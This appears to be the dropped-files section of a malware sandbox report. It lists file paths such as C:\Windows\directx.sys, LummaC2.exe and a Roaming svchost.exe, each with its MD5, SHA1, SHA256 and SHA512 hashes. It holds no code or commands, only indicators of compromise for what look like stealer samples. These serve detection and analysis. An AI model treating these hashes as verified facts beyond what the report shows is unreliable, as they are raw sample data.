| SHA512 | 3f9f0182d69b66ea6168717f8e7239a0726066e011be1983da874f76ee308e67ef55cd08a2d8990cd9e4a663bbbbf56c3445275d72e8330255b3d0dd3b98859a |
C:\Windows\directx.sys
| MD5 | aa9953e8bc92329018dbec54788ac717 |
| SHA1 | c42a85db4025801fe5af20caab9234d235e2520c |
| SHA256 | 34578269e5e1e399c3be1fbac8dc3d098b72d707d722470d990e72e9707cfb24 |
| SHA512 | ac8a85aa1b82b201b78dac3904cd5cb5ee2c08242cf294f72378cf02e9c4fa54471c7027b1b31471fc6d61963c959cd416fd4082e1211de0f17fa9483473a2eb |
C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe
| MD5 | ee4d5bd9f92faca11d441676ceddcec9 |
| SHA1 | 64626881b63abc37cd77fca95f524830849dd135 |
| SHA256 | d6872d521e977683f9fbf54b80e2a218aec4f0ae9caaa233ca9797f16c37b4d4 |
| SHA512 | 0daac4bdfc51994877c27f87377d210674c78eb4587a9baef6fbe46f5a1aa8e9ed700d4881356adc66c713562995a5fa5f56ecacc2a84ee2f695f2816fe63752 |
C:\Windows\directx.sys
| MD5 | 56221cd662b3daea4311f5029033e022 |
| SHA1 | 791eca3774be7507157442d610c3ca25f9f040d4 |
| SHA256 | 68ade7213b561689739bfe71d4c653776d0b4e9abaa975826ac97da1b3205028 |
| SHA512 | 99a5989ccdbd8d6607311ebadcf08953ca65a9815d841a5327528a6f708c58e8f4a2e8f93e5fd542b2c1b13ee60fafc9a0700644954808b96e4dc714a4214ec4 |
C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe
| MD5 | ee6be1648866b63fd7f860fa0114f368 |
| SHA1 | 42cab62fff29eb98851b33986b637514fc904f4b |
| SHA256 | e17bf83e09457d8cecd1f3e903fa4c9770e17e823731650a453bc479591ac511 |
| SHA512 | d6492d3b3c1d94d6c87b77a9a248e8c46b889d2e23938ddb8a8e242caccb23e8cd1a1fbeffee6b140cf6fd3ea7e8da89190286a912032ce4a671257bd8e3e28a |
C:\Windows\directx.sys
| MD5 | 7164615bccb5dfe1960626a65d7f39a9 |
| SHA1 | 001bdc5cd11128f4e8d7339e4637defffc3b8e1c |
| SHA256 | 8eb7301ffe1e4c02bbbd7631d7d678d8401412aa0d850068f49df57705f618b5 |
| SHA512 | 779821fa273b95cc1df56d8e5c713af57a201652ed8ad04009f8d1b436973426057b5712e31820340f8f54e740e485905be79e05e18af040afa5b0f0733f0dbb |
C:\Users\Admin\AppData\Local\Temp\Files\major.exe
| MD5 | fa3d03c319a7597712eeff1338dabf92 |
| SHA1 | f055ba8a644f68989edc21357c0b17fdf0ead77f |
| SHA256 | a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87 |
| SHA512 | 80226bb11d56e4dc2dbc4fc6aade47db4ca4c539b25ee70b81465e984df0287d5efcadb6ec8bfc418228c61bd164447d62c4444030d31655aaeed342e2507ea1 |
C:\Windows\directx.sys
| MD5 | 990314d15232eee10c39bd0a40661b24 |
| SHA1 | 196181e70280408088beb53381ae97f97a4cd6de |
| SHA256 | 83cf41dbb010727d022c58b4ccfb45abaf50758fa4ab71bb0ea2a88810a976b7 |
| SHA512 | 285566a84cf5fb0072c0a1465bcbcde8f16eaf53c097c39230ee8874624e5232bd23e05e6f312353c79ab133ed50ab8f5a2da2fe47a3ff94ea3ca8536736c3cb |
C:\Users\Admin\AppData\Local\Temp\Files\anubis.exe
| MD5 | 8391d3b5332c4b1164333ddce388a8c7 |
| SHA1 | b982fc92ed38565debf033b0ffaa2181a8caa5e7 |
| SHA256 | e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72 |
| SHA512 | f42b0ec317a534af6239ec7bfb6ff22e4e3e8abf0316b9a0666b073212f4ba6d989ddce2d40d0ea460e85b245b8637b1801bbf6ca5de9944171af3134cca2c96 |
C:\Windows\directx.sys
| MD5 | 9d36badb954d214cca8b3e9d58c40784 |
| SHA1 | c417b2de109a3d0ec84858ba787da85f5e8bc492 |
| SHA256 | a741ba46db56aeb9dc0c27cc8d6fd6e23afe6787c3b5be4f16640106e5888f87 |
| SHA512 | 49c7cc8a4ef35d9d7ca2fafcafdffc1eca287cd6b8822824720ce24a42ed655f9ec3b9b93c6bb52628dd285de4bc72e75f3a103a919a431bbacc709afcf4ba16 |
C:\Users\Admin\AppData\Local\Temp\Files\ZZZ.exe
| MD5 | 3663c34a774b45d65edb817e27dcbdae |
| SHA1 | 4e9333fbdc6540bc312f6b324df9eb7dafedde2e |
| SHA256 | f203e00cfa3c0ff98670d56ace48c0ee7bf1a997309a8da1379d5291cbe37c3d |
| SHA512 | 88c4939f5c2613e7fa62040d3307f9fc0c2f2e0bae4c7c166d5fb6ee6b921c99636dc89935b31c60d4ba45afd5ebdd80ba51914cb37e9e2a604781de89e45c05 |
C:\Windows\directx.sys
| MD5 | 69daf6661be1b73220d75c2bf5eaa73e |
| SHA1 | 0705484494c4c8f5dd145d76089220a406ab9c43 |
| SHA256 | a048745d503e007173a56e321037ddeb0adb1e13fac43e292a60969f0f4a8816 |
| SHA512 | ec11c727613dc179ef2dc971ec5e2ae6902d5fd46cfd3d61887117a67f935054c9b2b8be2ae98c00f97bce5eb92b82e96117e21f67da65e64a94f6aa4b5a924f |
C:\Windows\directx.sys
| MD5 | fd1ce14e3160fbf86f1bf44dd87a4d45 |
| SHA1 | 69d5d205a0b1a147c97d4d42a8b073ab79e990e9 |
| SHA256 | ca899c67d5fa2f5593b6c09a0af58d90fb69e962e4359e4ec22c55550e57ecb2 |
| SHA512 | 826225b11c9304c95345b197549414829ec4ea8f52a99db6c0d3379de8c33d5c9ef5b2fbebe4df9e283372248b41e7230cbc654fdb2a5f0d2a79470483b2734c |
C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
| MD5 | 2e87d4e593da9635c26553f5d5af389a |
| SHA1 | 64fad232e197d1bf0091db37e137ef722024b497 |
| SHA256 | 561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8 |
| SHA512 | 0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3 |
C:\Windows\directx.sys
| MD5 | 8b0a995545391b882fc260684f529208 |
| SHA1 | 89c5f15738b517ddce82013f845adabc0665ff5c |
| SHA256 | 264fa8be6e42cbe887633dc906f28d0d760464b874886766514ff5c2d1ce1c6e |
| SHA512 | baf9a6984e4e30b45b8630a0dfcdfc778baa19c946bb4ee1370e187f7b0d5591a3bc14f04abe353f2ba4ea836c80a60666f30162fe08095c574ed89a0b7c5636 |
C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe
| MD5 | 333e51675c05499cfadd3d5588f0f4ca |
| SHA1 | aca16eda7f33dfb85bed885e2437a8987d7a09e4 |
| SHA256 | cdc184f53927538be9c65604552977077e645e7e2d1e491ae357f15c14a78407 |
| SHA512 | 5c0a9609be977c5ee3561516791437afca6159d82955dc23ede5e6376f66df98d0e2d74f068ad2f350115cddf978450dfc17d0f97493a8128336e76a724ad335 |
C:\Windows\directx.sys
| MD5 | 9cf429dd4a6a0dd3cf7515dae6ef9327 |
| SHA1 | 3369feadd4197d7a368c14f1ef9c85631f8e605a |
| SHA256 | 8faf5200c821039d77d88884e7a03c79163700021ee5abb7239807bad24405b6 |
| SHA512 | 7a7a8f6950916729effa1dcc59838f0179b33ff8055fe1ea5f1e4c8b76f2e7ef073da4a3a0c3b03e6eee49e73f691df288637e822db7101d878e874d13cdabf1 |
C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe
| MD5 | bc884c0edbc8df559985b42fdd2fc985 |
| SHA1 | 9611a03c424e0285ab1a8ea9683918ce7b5909ab |
| SHA256 | e848b330ee5a8bd5ae1f6b991551e30a4a5b2e5deeb4718a15b2122101f2c270 |
| SHA512 | 1b8c97d500de45fbf994dcd9bf65cc78106a62ff0770a362add18866cceebbe9f5e157a77d26cb0d0d8de89abe3d446bc911f33e7027fa8f8809d2720b0cedcc |
C:\Windows\directx.sys
| MD5 | c7a0cc3965520cc38740111fe3f55b61 |
| SHA1 | 5cef4f1dae112429339f875da60a7d50d67cd78a |
| SHA256 | 5d42bd5ddcb1277949583349c95522426094bc8923c8df40daf26326bc090957 |
| SHA512 | cf7edeabebda1066a6305d91aabfe2fc3c58074eda009843dc684a7f86f98c9041baefce456d2ca55877edbcfed5b253bf53be3410d7f6cf93c412d735a16380 |
C:\Windows\directx.sys
| MD5 | 2338780ec1bc1f4b97424a1456262ba2 |
| SHA1 | 2285ee977709dc1ace6ddcf6bb39e4abc00471d0 |
| SHA256 | 73d0228c8aaeb6bcbd3d1cac2b2c480d6523eb5a6c9a752e6321bee7c60eba02 |
| SHA512 | 01326a1e951c8b7550e55075ff32eda424954bec3148dd32f89ddfd91e859f24ab62de53b07f8e2f9e037a5038c1204c5e06b86ce27b58bf5729402b6625f9f1 |
C:\Users\Admin\AppData\Local\Temp\Files\script.exe
| MD5 | 308d9beab0eccfd8f218a89456b9b7d4 |
| SHA1 | b444fa187f2762104248a6ad7d82b1e9e145e366 |
| SHA256 | 3570eab57ac55e89ce4467d665502896790881a21e93a25aabb738fa368e9e02 |
| SHA512 | b74095e5bc85fd4aef7685a18d4e7c64c322ba66823e8da6cd96f8551abf10f6376ac32728d33f72eb616e25587b442ff5a03866821151d64ac2102cffe68955 |
C:\Windows\directx.sys
| MD5 | 458e721a633dd02ee168373b349fa41f |
| SHA1 | c0a9797406339db9c1483559782ecf005972103b |
| SHA256 | 003520e16d86afae6689c72b47f71bddaa48467075f69f6e16c359de81ab9ab6 |
| SHA512 | 555400787909f3b4300763828f202584153ade87d9e456869b7c713472358f9854aa1ebff62aee0375c1723a888ac8a2ed6166834dd11186d9a4cce83345c012 |
C:\Users\Admin\AppData\Local\Temp\Files\Meeting.exe
| MD5 | 1ebcc328f7d1da17041835b0a960e1fa |
| SHA1 | adf1fe6df61d59ca7ac6232de6ed3c07d6656a8c |
| SHA256 | 6779bc4c64850150de694166f4b215ce25bbaca7d60b293fa7bb65e6bdecbc1a |
| SHA512 | 0c537e8dbdf5de433f862a31fbcb5a709f7727783cb36f7ed3dcac1acb44d704d5ad570035259022b46a0370754d029f476ae40280983d1586de9098e31a31d6 |
C:\Windows\directx.sys
| MD5 | 4520631eeebde97b3595206bb843d7c0 |
| SHA1 | 9d87ec8f38bd50360a26d7f18b3bbaf3a7c6629e |
| SHA256 | ab33dd8605a379c0c51a0325f873b8cc87388a27015e632f1286cb649a02fccb |
| SHA512 | 268628aac8e1a570ac0b3e1c772331ae646d5ef84f0f3988d1cf0731b8d08dd255cfecbb74d54a33d8d559e90c4afd7525776f4f0bd8b396acf26ef2b6584cf9 |
C:\Windows\directx.sys
| MD5 | 165ca0b749ab573917e42a7880593b98 |
| SHA1 | e49654cd0d55efff1f5042a1fc69a64aa36b7e7e |
| SHA256 | 316231260744d64cd01dff4ab583cdd1af7554b284fb52161c6c9b5e7740c84d |
| SHA512 | c45c5606ddd1333fa4beb6fa8f1ded9d88977d8d9af1f461df87484cdf5637c9f22018f8950cacae61e1efc12f393c7cf3e5a5ab4a4d2c5a6f2acbe64d83d634 |
C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe
| MD5 | c84baaa0b67d15dbc989ca2eb55a9b1c |
| SHA1 | 20231d1285e4de0916cc71e7d590313296f9d539 |
| SHA256 | 9f8b8bd90df6a73c3fbd5eb730ca6866f2de8f09ba273d73e7a91731ca90ae79 |
| SHA512 | 3decb9123dccef7da39cb2c51ba44b30fc79d68b9192b1e9fec95d3b19d2e77de593bfd6c2601718dc975148608ec21bfe047d103db1ba12fb1f2f954ea3de3f |
C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
| MD5 | 9b3eef2c222e08a30baefa06c4705ffc |
| SHA1 | 82847ce7892290e76be45b09aa309b27a9376e54 |
| SHA256 | 8903d4bfe61ca3ca897af368619fe98a7d0ee81495df032b9380f00af41bbfc7 |
| SHA512 | 5c72c37144b85b0a07077243ffe21907be315e90ba6c268fdb10597f1e3293e52a753dccbfd48578871a032898677c918fa71dc02d6861e05f98f5e718189b73 |
C:\Windows\directx.sys
| MD5 | 87ce6d7b069cd87bdd151abd8ced7e7a |
| SHA1 | 94eeff064ad184c76595a36888f243e442331c3a |
| SHA256 | ffd3911eb4a41072c93bb76e4ba94920c200e191b0d3df867ad8774062e0b65d |
| SHA512 | 94643d82e4e60b50dda43347568eb6362a6003fca1496965a7eb7cbe1b2ed466b406e013901c816e7446f7f9f41aaf3ec6fff1b2bbc9fccaebfd4971f68ffb00 |
C:\Users\Admin\AppData\Local\Temp\Files\XSploitLauncher.exe
| MD5 | 4bd68436e78a4a0f7bb552e349ab418f |
| SHA1 | a1c4c57efd9b246d85a47c523b5e0436b8c24deb |
| SHA256 | a52f8f78ba063951c3e315c562df187b90c257a61585e4682821abf6cefec957 |
| SHA512 | 070ebca410b909d0e0ce4ba9a8119aa45de42e1c8cffc18916b070e2ad6012f40f1b0784c375e8100a987ce84e71e51da353444241f9301217f159681c3d1bbd |
C:\Windows\directx.sys
| MD5 | 72d63b174b3773ce77b634431845a972 |
| SHA1 | 62bced2f020f057056c81ea03ff1812c2bd94742 |
| SHA256 | ff6a52a81e791de64e67cf5515570ba49faf2c0406464f6012b4b52ef8f8e7f3 |
| SHA512 | 304a6c040a4a3073537b656967bd6ff21064498a5ec88441c51b2a77cd4172adb91db5346acee407db699be5b2c127ccef8643bbd59cfb8d26cc5d6a14ed1d98 |
C:\Windows\directx.sys
| MD5 | 32775a9411b219ca34dc17a53a1bbcdf |
| SHA1 | 085b6cc3b170eba52aba15733210f0bf6c08c87c |
| SHA256 | 89f5327c69733ae36ea7f95365bda7cb175fb38a62186faf7d6507040d48496f |
| SHA512 | 63081531a1009371574a1d0faa3351ce720f30d6f4588a589d055947a2522ca46565f7cdc91b279d7a6f183c18e9ea404636e0b49f622dc62640c0e5ea5f2095 |
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 39476c74921658da58506252acd72f92 |
| SHA1 | 6b79e09a712dd56e8800ee191f18ead43ba7006a |
| SHA256 | 26cab4dad2281e9683c56570546a1940d257ddafcc706af85d60975a4dd2bb65 |
| SHA512 | 20b43bdd535e9fee2bfc988f83c4cdb72def36631d57a0444f2dccc3f03e1e450655d8eca5555e21b76588bb6228a45a6ee238cb23e8eeffddff618ea379dabd |
C:\Windows\directx.sys
| MD5 | 2565f7eba76dcf49918f8dbeea07d9d1 |
| SHA1 | bc04a7888ee83fb5896f5e70d63fdf1395133f81 |
| SHA256 | 939f7408f67db22361275c2ce47458ccafb6b7f7942abfc563d5d113a545fe31 |
| SHA512 | cd24dbee32529eb95302d92fe8c174ac978f51172a1b0fb9bf933e7cfbd47050dcfe2f19410858906ee73e193b2835aae5ce6ced2885d980322959ee6b1db8dc |
C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
| MD5 | 25ed0fce4a9df59b3ed88853db8206f3 |
| SHA1 | 4382f0adb2a94e8a4eccd6aa2d222842000b7895 |
| SHA256 | c5b32f1cdc2a48f1dd2b1623598c24a2635dc57fdab3b4328f1cb3b66f5079ba |
| SHA512 | 5a329229506e3f9feaefbe477699cc4b8510f949f4b1df0bf5b66ac892404a94fa5effef3d9acbdfa90bb6e494e5799fa721e14a29ec4e0f1e7b97719397939f |
C:\Windows\directx.sys
| MD5 | 6b9b9f45e1632060d475e787f583d7d5 |
| SHA1 | efb82ce05015771ece14c411db4095cc1c8c75a9 |
| SHA256 | 4beda534bf5d4da7763ba8fd127d15e48742aeee5402a2e0d48f59f960edf7cc |
| SHA512 | e165f4f36b590ee1aa782ed0157d9fc7ba8d84d5c528c194c8d195c0fed7b8be740cb6aed53ef7156840de36361b41f2da43a37a0c8832edae0c055e1a502a14 |
C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe
| MD5 | 913bdfccaaed0a1ed80d2c52e5f5d7c3 |
| SHA1 | 9befba3d43ace45a777d2e936e1046e7a0fb634c |
| SHA256 | 93e66ad3eea5b3217d9a016cb96951ab2dd0ae3f3ef6c2782667abacaaa8018f |
| SHA512 | 1999d174e14b96ccb35dc8ffa2cc576aff9d01d9373654a2a0f78342735e8b637f605144f5c56e922dc5ee43afb82e62ab9f21e0ecfd33a1b8369344346f90e6 |
C:\Windows\directx.sys
| MD5 | e68569c4801699b3cb99d6099c1162ea |
| SHA1 | 209555eeb6b800970a225227e714a4659c7a4ec7 |
| SHA256 | fc013ca86b76569251e12ecdd3205e14ca2793eb4dfe116046a6c10abb2759c1 |
| SHA512 | b3d0da21f1ae519daa22abd3bc28c183de7531a991d53daf060693f819b64c2aaac0463871d0708658d7ac79c6b5608389c909312286b74c7c8290f7c26bb2aa |
C:\Windows\directx.sys
| MD5 | a051804a55e27000cf84a88614b7a591 |
| SHA1 | 54b245c1ab6e77755aacc7d8878b0a65fa24be3f |
| SHA256 | 9910f538a1d96eca1278b8ab1093f3b3805b873ce8267517e8e9c650ed48c716 |
| SHA512 | 11607d2379b7aa85c656b789ccf0b8c6d15adc735c16c16b4276eac73d08c1238367044ecd8abda0acec464319a4d6ac8cf21c6d10671f9bbf755da2e2f1039a |
C:\Windows\directx.sys
| MD5 | 8a23e6c5964ee5698ede762f68caa8f2 |
| SHA1 | 04aba5515e02d58c3e3b2f64d6f510b45ba249e5 |
| SHA256 | f6ebca18cffed9fad751fd0998a897b163f637b0095da8eb951de347533ddf91 |
| SHA512 | 25229e2524941f82f33c6b4d97fc809e6fd50bf0d715bbe60ecca579537d035ed32d67fa8d36c1b0f18a72d2cbac00ba1e70d962c3bf579d8d8119a90f70b600 |